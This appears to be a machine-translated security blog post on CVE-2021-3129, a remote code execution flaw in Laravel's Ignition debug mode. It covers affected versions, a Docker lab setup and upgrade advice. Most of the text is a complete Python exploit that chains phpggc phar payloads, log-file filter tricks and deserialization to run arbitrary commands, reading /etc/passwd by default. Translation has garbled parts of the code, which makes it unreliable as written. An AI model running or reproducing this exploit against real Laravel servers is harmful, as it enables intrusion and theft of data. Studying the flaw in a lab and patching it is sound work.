Cve-2021-3129 -Laravel Debug mode Remote code execution vulnerability
I. Introduction of vulnerabilities
Laravel is a concise, open source PHP Web development framework designed to implement the MVC architecture of Web software.
When Laravel is in Debug mode, an attacker can make a malicious request to the file_get_contents() and file_put_contents() functions due to unsafe use of the Laravel Ignition component. Phar deserialization is triggered by the construction of a malicious Log file, which ultimately leads to remote code execution.
Second, impact version
Laravel < = 8.4.2
Ignition < 2.5.2
Environmental preparation & Vulnerability recurrence
Environment Address:
Environment and EXP download: Background reply “CVE-2021-3129” to download
Or download the following: https://github.com/SNCKER/CVE-2021-3129Copy the code
perform
docker-compse up -d
Copy the codeAccess port 8888
Visit http://127.0.0.1:8888
Vulnerability recurrence:
1. Exp is attached to the docker environment downloaded from GitHub. To use this exp, you need to download PHPGGC
Exp and PHPGGC are in the same directory. Python3 is used to execute exp
Macos execution error. Procedure
Switch the kali environment to execute the command:
Modify script add parameters:
Environment and EXP download: Background reply “CVE-2021-3129” to download
Py script code
#! /usr/bin/python3 import requests as req import os, uuid class Exp: __gadget_chains = { "monolog_rce1": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce1 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys; print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""", "monolog_rce2": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce2 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys; print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""", "monolog_rce3": r""" php -d 'phar.readonly=0' phpggc/phpggc monolog/rce3 system %s --phar phar -o php://output | base64 -w0 | python -c "import sys; print(''.join(['=' + hex(ord(i))[2:].zfill(2) + '=00' for i in sys.stdin.read()]).upper())" > payload.txt""", } # delimiter_len = 8 # delimiter length def __vul_check(self): resp = req.get(self.__url, verify=False) if resp.status_code ! = 405 and "laravel" not in resp.text: return False return True def __payload_send(self, payload): header = { "Accept": "application/json" } data = { "solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": { "variableName": "cve20213129", "viewFile": "" } } data["parameters"]["viewFile"] = payload resp = req.post(self.__url, headers=header, json=data, verify=False) # print(resp.text) return resp def __command_handler(self, command): """ Because user commands are injected into commands generated by payload, some processing is done to prevent affecting the structure. """ self.__delimiter = STR (uuid.uuid1())[:self.__delimiter_len] # Delimiter used to locate command execution results on the page. # print(delimiter) command = "echo %s && %s && echo %s" % (self.__delimiter, command, Self. __delimiter) # print (command) escaped_chars = [', '&', '|'] # I only think of so many, can add. for c in escaped_chars: command = command.replace(c, '\\' + c) # print(command) return command def __clear_log(self): return self.__payload_send( "php://filter/write=convert.iconv.utf-8.utf-16le|convert.quoted-printable-encode|convert.iconv.utf-16le.utf-8|convert.ba se64-decode/resource=.. /storage/logs/laravel.log") def __gen_payload(self, gadget_chain): gen_shell = self.__gadget_chains[gadget_chain] % (self.__command) # print(gen_shell) os.system(gen_shell) with open('payload.txt', 'r') as f: payload = f.read().replace('\n', OS. System ("rm paypay.txt ") # print(payload) return payload def __decode_log(self): return self.__payload_send( "php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=.. /storage/logs/laravel.log") def __unserialize_log(self): return self.__payload_send("phar://.. /storage/logs/laravel.log/test.txt") def __rce(self): text = self.__unserialize_log().text # print(text) echo_find = text.find(self.__delimiter) # print(echo_find) if echo_find >= 0: return text[echo_find + self.__delimiter_len + 1: text.find(self.__delimiter, echo_find + 1)] else: return "[-] RCE echo is not found." def exp(self): for gadget_chain in self.__gadget_chains.keys(): print("[*] Try to use %s for exploitation." % (gadget_chain)) self.__clear_log() self.__clear_log() self.__payload_send('a' * 2) self.__payload_send(self.__gen_payload(gadget_chain)) self.__decode_log() print("[*] Result:") print(self.__rce()) def __init__(self, target, command): self.target = target self.__url = req.compat.urljoin(target, "_ignition/execute-solution") self.__command = self.__command_handler(command) if not self.__vul_check(): print("[-] [%s] is seems not vulnerable." % (self.target)) print("[*] You can also call obj.exp() to force an attack.") The else: self. J exp (def) the main () : exp (" http://127.0.0.1:8888 ", "cat/etc/passwd") if __name__ = = "__main__ ': the main ()Copy the codeFour, safety suggestions
It is recommended to upgrade the Laravel framework to 8.4.3 and above, or upgrade the Ignition component to 2.5.2 and above.
Download link:
Laravel.com/docs/8.x#la…
Reference:
Mp.weixin.qq.com/s/ShRvF_YeV…
Github.com/SNCKER/CVE-…
www.venustech.com.cn/new\_type/a…
Disclaimer: This site provides safety tools, procedures (methods) may be offensive, only for safety research and teaching, risk!
Disclaimer: Copyright belongs to the author. Commercial reprint please contact the author for authorization, non-commercial reprint please indicate the source.
Subscribe for more revisited articles and study notes
thelostworld
Safe road, side by side with you !!!!
Personal knowledge: www.zhihu.com/people/fu-w…
Brief personal book: www.jianshu.com/u/bf0e38a8d…
Personal CSDN: blog.csdn.net/qq\_3760279…
Personal blog garden: www.cnblogs.com/thelostworl…
FREEBUF homepage: www.freebuf.com/author/thel…
